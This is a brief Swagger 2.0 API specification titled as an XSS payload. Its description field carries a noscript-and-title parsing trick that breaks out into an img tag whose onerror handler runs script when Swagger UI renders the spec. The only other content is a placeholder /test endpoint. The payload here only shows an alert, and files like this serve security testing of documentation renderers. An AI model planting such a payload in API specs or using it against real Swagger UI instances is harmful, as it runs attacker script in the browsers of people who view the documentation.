swagger: '2.0'
info:
  title: CSP-Aware Swagger XSS Payload
  description: |
    <noscript><p title="</noscript><img src=x onerror=alert('bypass')>">
  version: 1.0.0
paths:
  /test:
    get:
      parameters:
        - name: test
          in: query
          type: string
      responses:
        '200':
          description: Test endpoint
